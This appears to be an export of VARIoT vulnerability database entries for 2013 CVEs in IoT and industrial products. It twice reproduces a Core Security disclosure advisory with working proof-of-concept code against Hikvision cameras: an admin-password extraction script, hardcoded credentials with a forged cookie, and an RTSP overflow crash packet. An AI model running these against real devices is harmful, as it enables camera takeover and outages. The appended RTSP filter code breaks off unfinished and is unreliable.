VARIoT IoT vulnerabilities database


VAR-201308-0227 CVE-2013-4031 Integrated Management Module on multiple IBM server products vulnerable to unauthorized power actions CVSS V2: 10.0
CVSS V3: -
Severity: High
The Intelligent Platform Management Interface (IPMI) implementation in Integrated Management Module (IMM) and Integrated Management Module II (IMM2) on IBM BladeCenter, Flex System, System x iDataPlex, and System x3### servers has a default password for the IPMI user account, which makes it easier for remote attackers to perform power-on, power-off, or reboot actions, or add or modify accounts, via unspecified vectors. System X3250 M4 is prone to a denial-of-service vulnerability
VAR-201404-0293 CVE-2013-7355 SQL injection vulnerability in SAP BI Universal Data Integration CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
SQL injection vulnerability in SAP BI Universal Data Integration allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to the J2EE schema. SAP BI Universal Data Integration is a universal data analysis interface for SAP BI solutions from SAP. The program does not properly filter user-provided input before using it in SQL queries. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database
VAR-201308-0248 CVE-2013-4219 Integer overflow vulnerability in Intel WiMAX Network Service for Intel Wireless WiMAX Connection 2400 CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Multiple integer overflows in the Intel WiMAX Network Service through 1.5.2 for Intel Wireless WiMAX Connection 2400 devices allow remote attackers to cause a denial of service (component crash) or possibly execute arbitrary code via an L5 connection with a crafted PDU value that triggers a heap-based buffer overflow within (1) L5SocketsDispatcher.c or (2) L5Connector.c. wimax-ns is prone to multiple security vulnerabilities, including: (1) an insecure file-permission issue, (2) multiple information-disclosure issues, and (3) multiple buffer-overflow issues. Attackers can exploit these issues to disclose sensitive information and execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition. Intel WiMAX Network Service is a network service of Intel Corporation that integrates 802.16 wireless metropolitan area network technology. These vulnerabilities are caused by the socket dispatcher and connector modules of the L5 connection failing to filter user-submitted input when processing payload data units (PDUs)
VAR-201308-0247 CVE-2013-4218 Information disclosure vulnerability in Intel WiMAX Network Service for Intel Wireless WiMAX Connection 2400 CVSS V2: 2.1
CVSS V3: -
Severity: LOW
The InitMethodAndPassword function in InfraStack/OSAgnostic/WiMax/Agents/Supplicant/Source/SupplicantAgent.c in the Intel WiMAX Network Service through 1.5.2 for Intel Wireless WiMAX Connection 2400 devices uses the same RSA private key in supplicant_key.pem on all systems, which allows local users to obtain sensitive information via unspecified decryption operations. wimax-ns is prone to multiple security vulnerabilities, including: (1) an insecure file-permission issue, (2) multiple information-disclosure issues, and (3) multiple buffer-overflow issues. Attackers can exploit these issues to disclose sensitive information and execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition. A local attacker could exploit this vulnerability to obtain sensitive information through a decryption operation
VAR-201308-0246 CVE-2013-4217 Information disclosure vulnerability in Intel WiMAX Network Service for Intel Wireless WiMAX Connection 2400 CVSS V2: 2.1
CVSS V3: -
Severity: LOW
The OSAL_Crypt_SetEncryptedPassword function in InfraStack/OSDependent/Linux/OSAL/Services/wimax_osal_crypt_services.c in the OSAL crypt module in the Intel WiMAX Network Service through 1.5.2 for Intel Wireless WiMAX Connection 2400 devices logs a cleartext password during certain attempts to set a password, which allows local users to obtain sensitive information by reading a log file. wimax-ns is prone to multiple security vulnerabilities, including: (1) an insecure file-permission issue, (2) multiple information-disclosure issues, and (3) multiple buffer-overflow issues. Attackers can exploit these issues to disclose sensitive information and execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition. Intel WiMAX Network Service is a network service of Intel Corporation that integrates 802.16 wireless metropolitan area network technology. A local attacker could exploit this vulnerability to obtain sensitive information by reading log files
VAR-201308-0245 CVE-2013-4216 Denial of service (DoS) vulnerability in Intel WiMAX Network Service for Intel Wireless WiMAX Connection 2400 CVSS V2: 2.1
CVSS V3: -
Severity: LOW
The Trace_OpenLogFile function in InfraStack/OSDependent/Linux/InfraStackModules/TraceModule/TraceModule.c in the Trace module in the Intel WiMAX Network Service through 1.5.2 for Intel Wireless WiMAX Connection 2400 devices uses world-writable permissions for wimaxd.log, which allows local users to cause a denial of service (data corruption) by modifying this file. wimax-ns is prone to multiple security vulnerabilities, including: (1) an insecure file-permission issue, (2) multiple information-disclosure issues, and (3) multiple buffer-overflow issues. Attackers can exploit these issues to disclose sensitive information and execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition
VAR-201308-0166 CVE-2013-2792 Denial of service (DoS) vulnerability in multiple Schweitzer Engineering Laboratories products CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
Schweitzer Engineering Laboratories (SEL) SEL-2241, SEL-3505, and SEL-3530 RTAC master devices allow remote attackers to cause a denial of service (infinite loop) via a crafted DNP3 TCP packet. Schweitzer Engineering Laboratories is a leading manufacturer in Washington State, USA, and is a leader in power system relay protection, control, monitoring, metering and SCADA. Under certain conditions, the DNP3 driver will automatically restart and resume communication, but in severe cases the device ALARM contact will assert and the device driver settings will need to be reloaded. The affected products are as follows: SEL-3530-R100-V0-Z001001-D20090915 through SEL-3530-R123-V0-Z002001; SEL-3530-4-R107-V0-Z001001-D20100818 through SEL-3530-4-R123-V0-Z002001-D20130117; SEL-3505-R119-V0-Z001001-D20120720 through SEL-3505-R123-V0-Z002001-D20130117; SEL-2241-R113-V0-Z001001-D20110721 through SEL-2241-R123-V0-Z002001-D20130117. Multiple Schweitzer Engineering Laboratories devices are prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected device, denying service to legitimate users. Note: This issue affects the IP-connected devices
VAR-201308-0168 CVE-2013-2798 Schweitzer Engineering Laboratories Multiple Device Local Denial of Service Vulnerabilities CVSS V2: 4.7
CVSS V3: -
Severity: MEDIUM
Schweitzer Engineering Laboratories (SEL) SEL-2241, SEL-3505, and SEL-3530 RTAC master devices allow physically proximate attackers to cause a denial of service (infinite loop) via crafted input over a serial line. Schweitzer Engineering Laboratories is a leading manufacturer in Washington State, USA, and is a leader in power system relay protection, control, monitoring, metering and SCADA. Under certain conditions, the DNP3 driver will automatically restart and resume communication, but in severe cases the device ALARM contact will assert and the device driver settings will need to be reloaded. The affected products are as follows: SEL-3530-R100-V0-Z001001-D20090915 through SEL-3530-R123-V0-Z002001; SEL-3530-4-R107-V0-Z001001-D20100818 through SEL-3530-4-R123-V0-Z002001-D20130117; SEL-3505-R119-V0-Z001001-D20120720 through SEL-3505-R123-V0-Z002001-D20130117; SEL-2241-R113-V0-Z001001-D20110721 through SEL-2241-R123-V0-Z002001-D20130117. Multiple Schweitzer Engineering Laboratories devices are prone to a local denial-of-service vulnerability. An attacker can exploit this issue to crash the affected device, denying service to legitimate users. NOTE: To exploit this issue, local access to the serial-based outstation is required
VAR-201308-0221 CVE-2013-3454 Cisco TelePresence System Software on multiple Cisco TelePresence System devices vulnerable to configuration modification CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Cisco TelePresence System Software 1.10.1 and earlier on 500, 13X0, 1X00, 30X0, and 3X00 devices, and 6.0.3 and earlier on TX 9X00 devices, has a default password for the pwrecovery account, which makes it easier for remote attackers to modify the configuration or perform arbitrary actions via HTTPS requests, aka Bug ID CSCui43128. The vendor has published this vulnerability as Bug ID CSCui43128. A third party may change settings or take arbitrary actions via HTTPS requests. Cisco TelePresence System Software is prone to an unauthorized-access vulnerability. Attackers can exploit this issue to gain unauthorized administrative access to the affected system. This may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCui43128. Cisco TelePresence is a set of video conferencing solutions, the "TelePresence" system, from Cisco. The solution provides components such as audio and video spaces, which can give remote participants a "face-to-face" virtual meeting room effect. A remote attacker can exploit this vulnerability to modify the configuration or perform arbitrary operations through HTTPS requests
VAR-201401-0109 CVE-2013-5092 Cross-site scripting vulnerability in afa/php/Login.php in AlgoSec Firewall Analyzer CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in afa/php/Login.php in AlgoSec Firewall Analyzer 6.1-b86 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. AlgoSec Firewall Analyzer 6.1-b86 is affected; other versions may also be vulnerable. AlgoSec Firewall Analyzer (AFA) is a set of firewall analysis solutions from AlgoSec Company in the United States. The solution supports automatic detection of security loopholes in firewall policies. A cross-site scripting vulnerability exists in the afa/php/Login.php script in version 6.1-b86 of AFA
VAR-201308-0101 CVE-2013-3659 Vulnerability in the connection process of the docomo overseas usage application CVSS V2: 3.3
CVSS V3: -
Severity: LOW
The NTT DOCOMO overseas usage application 2.0.0 through 2.0.4 for Android does not properly connect to Wi-Fi access points, which allows remote attackers to obtain sensitive information by leveraging presence in an 802.11 network's coverage area. docomo overseas usage is prone to an information-disclosure vulnerability. Attackers can exploit this issue to disclose potentially sensitive information through man-in-the-middle attacks. This may aid in further attacks. docomo overseas usage versions 2.0.0 through 2.0.4 are vulnerable
VAR-201308-0296 CVE-2013-5024 Vulnerability in NI .NET Class Library Help in National Instruments LabWindows/CVI CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
An ActiveX control in NationalInstruments.Help2.dll in National Instruments NI .NET Class Library Help, as used in Measurement Studio 2013 and earlier and other products, allows remote attackers to obtain sensitive information about the existence of registry keys via crafted (1) key-open or (2) key-close method calls. Attackers may exploit this issue by enticing an unsuspecting victim to view a malicious webpage. The impact of this issue is currently unknown. We will update this BID as more information becomes available
VAR-201308-0295 CVE-2013-5023 Vulnerability in NI Help Links in National Instruments LabWindows/CVI, LabVIEW and other products CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The ActiveX controls in the HelpAsst component in NI Help Links in National Instruments LabWindows/CVI 2012 SP1 and earlier, LabVIEW 2012 SP1 and earlier, and other products allow remote attackers to cause a denial of service by triggering the display of local .chm files. Attackers may exploit this issue by enticing an unsuspecting victim to view a malicious webpage. The impact of this issue is currently unknown. We will update this BID as more information becomes available. The following products are affected: Diadem 2012 and prior; LabVIEW 2012 and prior; LabWindows/CVI 2012 and prior; Measurement Studio 2013 and prior; TestStand 2012 and prior
VAR-201308-0294 CVE-2013-5022 Absolute path traversal vulnerability in cw3dgrph.ocx used in National Instruments LabWindows/CVI, LabVIEW and other products CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Absolute path traversal vulnerability in the 3D Graph ActiveX control in cw3dgrph.ocx in National Instruments LabWindows/CVI 2012 SP1 and earlier, LabVIEW 2012 SP1 and earlier, and other products allows remote attackers to create and execute arbitrary files via a full pathname in an argument to the ExportStyle method, in conjunction with file content in the (1) Caption or (2) FormatString property value. Attackers can exploit this issue to create and execute arbitrary files in the context of the application (typically Internet Explorer) that is using the ActiveX control, which may aid in remote code execution. The following products are affected: LabVIEW 2012 and prior; LabWindows/CVI 2012 and prior; Measurement Studio 2013 and prior; TestStand 2012 and prior
VAR-201912-1602 CVE-2013-4975 Privilege management vulnerability in Hikvision DS-2CD7153-E IP Camera CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
Hikvision DS-2CD7153-E IP Camera has a privilege escalation vulnerability. The Hikvision DS-2CD7153-E IP Camera contains a privilege management vulnerability: information may be acquired, information may be falsified, and a denial of service (DoS) may result. Multiple scripts on the Hikvision DS-2CD7153-E IP Camera device have security vulnerabilities that allow authenticated remote attackers to submit crafted requests to obtain the administrative password and elevate privileges. An attacker can exploit this issue to gain elevated privileges on affected devices. Hikvision DS-2CD7153-E IP camera running firmware 4.1.0 b130111 is vulnerable; others may also be affected.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Hikvision IP Cameras Multiple Vulnerabilities

1. *Advisory Information*

Title: Hikvision IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0708
Advisory URL: http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities
Date published: 2013-08-06
Date of last update: 2013-08-06
Vendors contacted: Hikvision
Release mode: User release

2. *Vulnerability Information*

Class: Input validation error [CWE-20], Use of Hard-coded Credentials [CWE-798], Buffer overflow [CWE-119]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-4975, CVE-2013-4976, CVE-2013-4977

3. *Vulnerability Description*

Multiple vulnerabilities have been found in Hikvision IP camera DS-2CD7153-E [1] (and potentially other cameras sharing the affected firmware [2]) that could allow a remote attacker:

1. [CVE-2013-4975] To obtain the admin password from a non-privileged user account.
2. [CVE-2013-4976] To bypass the anonymous user authentication using hard-coded credentials (even if the built-in anonymous user account was explicitly disabled).
3. [CVE-2013-4977] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP packet handler.

4. *Vulnerable Packages*

. Other devices based on the same firmware [2] are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

There was no official answer from Hikvision after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be:

. Do not expose the camera to internet unless absolutely necessary.
. Have at least one proxy filtering HTTP requests to '/PSIA/System/ConfigurationData'.
. Have at least one proxy filtering the 'Range' parameter in RTSP requests.

6. *Credits*

. [CVE-2013-4975] was discovered and researched by Alberto Solino from Core Security.
. [CVE-2013-4976] was discovered and researched by Alejandro Rodriguez from Core Exploit QA Team.
. [CVE-2013-4977] was discovered by Anibal Sacco. Analysis and research by Anibal Sacco and Federico Muttis from Core Exploit Writers Team.

The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Privilege Escalation through ConfigurationData Request*

[CVE-2013-4975] The following script allows obtaining the administrator password by requesting the camera's configuration data and breaking its trivial encryption. A valid user account is needed to launch the attack.

/-----
import urllib2
import base64
import argparse
import sys

def decrypt(config):
    # Important: We're assuming the last 4 bytes of the file's plaintext are
    # zero, hence there we have the key. There are other easy ways to
    # calculate this tho.
    print '[*] Decrypting config'
    key = config[-4:]
    plaintext = ''
    for i in range(len(config)/4):
        for j in range(4):
            plaintext += chr(ord(config[i*4+j]) ^ ord(key[j]))
    return plaintext

def attack(target, username, password, output):
    base_url = 'http://' + target + '/PSIA/System/ConfigurationData'
    headers = { 'Authorization': 'Basic ' + base64.b64encode('%s:%s' %(username,password)) }
    print '[*] Attacking %s ' % target
    req = urllib2.Request(base_url, None, headers)
    try:
        response = urllib2.urlopen(req)
        config = response.read()
    except Exception, e:
        print e
        return
    plaintext = decrypt(config)
    print '[*] Writing output file %s' % output
    f = open(output, 'w')
    f.write(plaintext)
    f.close()
    user = plaintext[0x45A0:0x45A0+32]
    pwd = plaintext[0x45C0:0x45C0+16]
    print 'Probably the admin user is %s and the password is %s' % (user, pwd)
    print "If it doesn't make any sense, just do a strings of the output file"

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('target', action = 'store', help = 'target host to attack')
    parser.add_argument('username', action = 'store', help = 'username to be used to authenticate against target')
    parser.add_argument('password', action = 'store', help = "username's password")
    parser.add_argument('output', action = 'store', help = "filename to write the plaintext config")
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    options = parser.parse_args()
    attack(options.target, options.username, options.password, options.output)
-----/

7.2. *Anonymous User Authentication Bypass*

[CVE-2013-4976] The camera has a built-in anonymous account intended for guest users, but even when the feature is disabled it could be bypassed due to the usage of hardcoded credentials:

/-----
user: anonymous
password: \177\177\177\177\177\177
-----/

The bypass cannot be used directly through the login form but rather by forging a cookie:

1. Load the login page to generate the initial cookies of the camera's webapp.
2. Use your preferred tool (for example Firebug on Firefox) to create a cookie with the name 'userInfoXX' (replace XX with the port where the webserver is running, i.e. 'userInfo80'), path '/' and value 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='; this is the tuple 'user:pass' explained above, encoded in base64.
3. Request the URI 'http://<ipcam>/doc/pages/main.asp', a page that should not be accessible without authentication if the anonymous user is disabled.

There are several references to those hardcoded credentials in the cgis, but in particular the following snippet was found in '/doc/pages/scripts/login.js':

/-----
107: function DoLogin(){
(...)
166: $.cookie('userInfo'+m_lHttpPort,m_szUserPwdValue==""?Base64.encode("anonymous:\177\177\177\177\177\177" ):m_szUserPwdValue);
(...)
-----/

This bypass is not completely useful per se since all the interesting requests are actually handled by the PSIA (Physical Security Interoperability Alliance's) API. Nevertheless, if it is ever combined with a privilege escalation it would allow a remote attacker to control the camera without proper credentials.

7.3. *Buffer Overflow in the RTSP Packet Handler*

[CVE-2013-4977] The following Python script sends a specially crafted packet that triggers a buffer overrun condition when handling the 'Range' parameter of an RTSP transaction. As a result, the process handling the communication crashes and the Watchdog service issues a full restart. No authentication is required to exploit this vulnerability and it could possibly lead to remote code execution.

/-----
import socket

HOST = '192.168.1.100'
PORT = 554

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
trigger_pkt += "CSeq: 7\r\n"
trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"

s.sendall(trigger_pkt)
print "Packet sent"
data = s.recv(1024)
print 'Received', repr(data), "\r\n"
s.close()
-----/

8. *Report Timeline*

. 2013-07-08: Core attempts to report the vulnerability using the Hikvision official contact addresses [3]. No reply received.
. 2013-07-15: Core attempts to contact vendor.
. 2013-07-22: Core attempts to contact vendor.
. 2013-07-30: Core attempts to contact vendor.
. 2013-08-06: Advisory CORE-2013-0708 published as 'user release'.

9. *References*

[1] Hikvision DS-2CD7153-E Network Mini Dome Camera, http://www.hikvision.com/en/products_show.asp?id=506.
[3] Hikvision contact page, http://www.hikvision.com/En/US/contactHikvision.asp.

10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
VAR-201912-1603 CVE-2013-4976 Authentication vulnerability in Hikvision DS-2CD7153-E IP Camera CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Hikvision DS-2CD7153-E IP Camera has a security bypass via hardcoded credentials. The Hikvision DS-2CD7153-E IP Camera contains an authentication vulnerability: information may be acquired, information may be falsified, and a denial of service (DoS) may result. Hikvision DS-2CD7153-E IP Camera is a webcam product. The Hikvision DS-2CD7153-E IP Camera device has an anonymous account for the Guest user; the username is 'anonymous' and the password is \177\177\177\177\177\177. Even if this feature is disabled, the restriction can be bypassed to submit unauthorized requests to control the camera. An attacker can leverage this issue to gain access to the vulnerable device. NOTE: Other camera devices running firmware 4.1.0 b130111 may also be affected. This issue is described in Core Security advisory CORE-2013-0708, reproduced in full in the CVE-2013-4975 entry above
VAR-201308-0298 CVE-2013-5026 National Instruments Lookout ActiveX control vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
An ActiveX control in lookout650.ocx, lookout660.ocx, and lookout670.ocx in National Instruments Lookout 6.5 through 6.7 allows remote attackers to execute arbitrary code by triggering the download of, and calls to, an arbitrary DLL file. The ActiveX controls shipped with National Instruments Lookout (lookout650.ocx, lookout660.ocx and lookout670.ocx) contain an unspecified vulnerability caused by incomplete input processing; the impact is unspecified. National Instruments Lookout is HMI/SCADA software. The vulnerability is related to lookout650.ocx, lookout660.ocx and lookout670.ocx. The impact of this issue is currently unknown. We will update this BID as more information emerges
VAR-201403-0122 CVE-2013-4977 Hikvision DS-2CD7153-E IP Camera firmware RTSP Packet Handler Vulnerable to buffer overflow CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Buffer overflow in the RTSP Packet Handler in Hikvision DS-2CD7153-E IP camera with firmware 4.1.0 b130111 (Jan 2013), and possibly other devices, allows remote attackers to cause a denial of service (device crash and reboot) and possibly execute arbitrary code via a long string in the Range header field in an RTSP transaction. Hikvision DS-2CD7153-E IP Camera is a webcam product. Hikvision DS-2CD7153-E IP camera is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code within the context of the affected device. Failed exploit attempts may result in a denial-of-service condition. Hikvision DS-2CD7153-E IP camera running firmware 4.1.0 b130111 is vulnerable; other devices may also be affected.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Hikvision IP Cameras Multiple Vulnerabilities

1. *Advisory Information*

Title: Hikvision IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0708
Advisory URL: http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities
Date published: 2013-08-06
Date of last update: 2013-08-06
Vendors contacted: Hikvision
Release mode: User release

2. *Vulnerability Information*

Class: Input validation error [CWE-20], Use of Hard-coded Credentials [CWE-798], Buffer overflow [CWE-119]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-4975, CVE-2013-4976, CVE-2013-4977

3.

1. [CVE-2013-4975] To obtain the admin password from a non-privileged user account.
2. [CVE-2013-4976] To bypass the anonymous user authentication using hard-coded credentials (even if the built-in anonymous user account was explicitly disabled).
3.

4. *Vulnerable Packages*

.

5. *Vendor Information, Solutions and Workarounds*

There was no official answer from Hikvision after several attempts (see [Sec. 8]); contact the vendor for further information.

Some mitigation actions may be:

. Do not expose the camera to the Internet unless absolutely necessary.
. Have at least one proxy filtering HTTP requests to '/PSIA/System/ConfigurationData'.
. Have at least one proxy filtering the 'Range' parameter in RTSP requests.

6. *Credits*

. [CVE-2013-4975] was discovered and researched by Alberto Solino from Core Security.
. [CVE-2013-4976] was discovered and researched by Alejandro Rodriguez from Core Exploit QA Team.
. [CVE-2013-4977] was discovered by Anibal Sacco. Analysis and research by Anibal Sacco and Federico Muttis from Core Exploit Writers Team.

The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Privilege Escalation through ConfigurationData Request* [CVE-2013-4975]

The following script obtains the administrator password by requesting the camera's configuration data and breaking its trivial encryption. A valid user account is needed to launch the attack.

/-----
import urllib2
import base64
import argparse
import sys

def decrypt(config):
    # Important: We're assuming the last 4 bytes of the file's plaintext are
    # zero, hence there we have the key. There are other easy ways to
    # calculate this tho.
    print '[*] Decrypting config'
    key = config[-4:]
    plaintext = ''
    for i in range(len(config)/4):
        for j in range(4):
            plaintext += chr(ord(config[i*4+j]) ^ ord(key[j]))
    return plaintext

def attack(target, username, password, output):
    base_url = 'http://' + target + '/PSIA/System/ConfigurationData'
    headers = { 'Authorization': 'Basic ' + base64.b64encode('%s:%s' %(username,password)) }
    print '[*] Attacking %s ' % target
    req = urllib2.Request(base_url, None, headers)
    try:
        response = urllib2.urlopen(req)
        config = response.read()
    except Exception, e:
        print e
        return
    plaintext = decrypt(config)
    print '[*] Writing output file %s' % output
    f = open(output, 'w')
    f.write(plaintext)
    f.close()
    user = plaintext[0x45A0:0x45A0+32]
    pwd = plaintext[0x45C0:0x45C0+16]
    print 'Probably the admin user is %s and the password is %s' % (user, pwd)
    print "If it doesn't make any sense, just do a strings of the output file"

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('target', action = 'store', help = 'target host to attack')
    parser.add_argument('username', action = 'store', help = 'username to be used to authenticate against target')
    parser.add_argument('password', action = 'store', help = "username's password")
    parser.add_argument('output', action = 'store', help = "filename to write the plaintext config")
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    options = parser.parse_args()
    attack(options.target, options.username, options.password, options.output)
-----/

7.2. *Anonymous User Authentication Bypass* [CVE-2013-4976]

The camera has a built-in anonymous account intended for guest users, but even when the feature is disabled it can be bypassed because of hardcoded credentials:

/-----
user: anonymous
password: \177\177\177\177\177\177
-----/

The bypass cannot be used directly through the login form but rather by forging a cookie:

1. Load the login page to generate the initial cookies of the camera's webapp.
2. Use your preferred tool (for example Firebug on Firefox) to create a cookie with the name 'userInfoXX' (replace XX with the port where the webserver is running, i.e. 'userInfo80'), path '/' and value 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='; this is the 'user:pass' tuple explained above, encoded in base64.
3. Request the URI 'http://<ipcam>/doc/pages/main.asp', a page that should not be accessible without authentication if the anonymous user is disabled.

There are several references to those hardcoded credentials in the CGIs, but in particular the following snippet was found in '/doc/pages/scripts/login.js':

/-----
107: function DoLogin(){
(...)
166: $.cookie('userInfo'+m_lHttpPort,m_szUserPwdValue==""?Base64.encode("anonymous:\177\177\177\177\177\177" ):m_szUserPwdValue);
(...)
-----/

This bypass is not completely useful per se, since all the interesting requests are actually handled by the PSIA (Physical Security Interoperability Alliance) API. Nevertheless, if it is ever combined with a privilege escalation it would allow a remote attacker to control the camera without proper credentials.

7.3. *Buffer Overflow in the RTSP Packet Handler* [CVE-2013-4977]

The following Python script sends a specially crafted packet that triggers a buffer overrun condition when handling the 'Range' parameter of an RTSP transaction. As a result, the process handling the communication crashes and the Watchdog service issues a full restart. No authentication is required to exploit this vulnerability and it could possibly lead to remote code execution.

/-----
import socket

HOST = '192.168.1.100'
PORT = 554

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
trigger_pkt += "CSeq: 7\r\n"
trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"

s.sendall(trigger_pkt)
print "Packet sent"
data = s.recv(1024)
print 'Received', repr(data), "\r\n"
s.close()
-----/

8. *Report Timeline*

. 2013-07-08: Core attempts to report the vulnerability using the Hikvision official contact addresses [3]. No reply received.
. 2013-07-15: Core attempts to contact vendor.
. 2013-07-22: Core attempts to contact vendor.
. 2013-07-30: Core attempts to contact vendor.
. 2013-08-06: Advisory CORE-2013-0708 published as 'user release'.

9. *References*

[1] Hikvision DS-2CD7153-E Network Mini Dome Camera, http://www.hikvision.com/en/products_show.asp?id=506.
[3] Hikvision contact page, http://www.hikvision.com/En/US/contactHikvision.asp.

10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of the Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
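The advisory's mitigation list (section 5) recommends a proxy that filters the 'Range' parameter of RTSP requests, and section 7.3 shows the oversized Range value that crashes the camera. The following is an added example, not code from the Core Security advisory, from Hikvision or from any proxy product: a minimal RTSP request filter that parses a raw request, bounds the length of the Range header and checks it against the RFC 2326 range grammar before the request is forwarded. MAX_RANGE_LEN is an assumed bound chosen for this example (the advisory does not state the size of the vulnerable buffer), and the sample requests are constructed here, with the trigger value copied from section 7.3 so the filter can be checked against it.

```python
# Added example: RTSP Range-header filter of the kind the advisory's
# mitigation suggests.  Not part of the advisory or of any vendor product.
import re

# Assumed bound for this example; legitimate npt/smpte/clock ranges are far
# shorter, while the advisory's trigger value is 73 bytes.
MAX_RANGE_LEN = 64

# RFC 2326 range time formats (single range only, digit counts bounded).
NPT_TIME = r'(?:now|\d{1,6}(?:\.\d{1,6})?|\d{1,2}:\d{2}:\d{2}(?:\.\d{1,6})?)'
SMPTE_TIME = r'(?:\d{1,2}:\d{2}:\d{2}(?::\d{1,2}(?:\.\d{1,2})?)?)'
CLOCK_TIME = r'(?:\d{8}T\d{6}(?:\.\d{1,6})?Z)'
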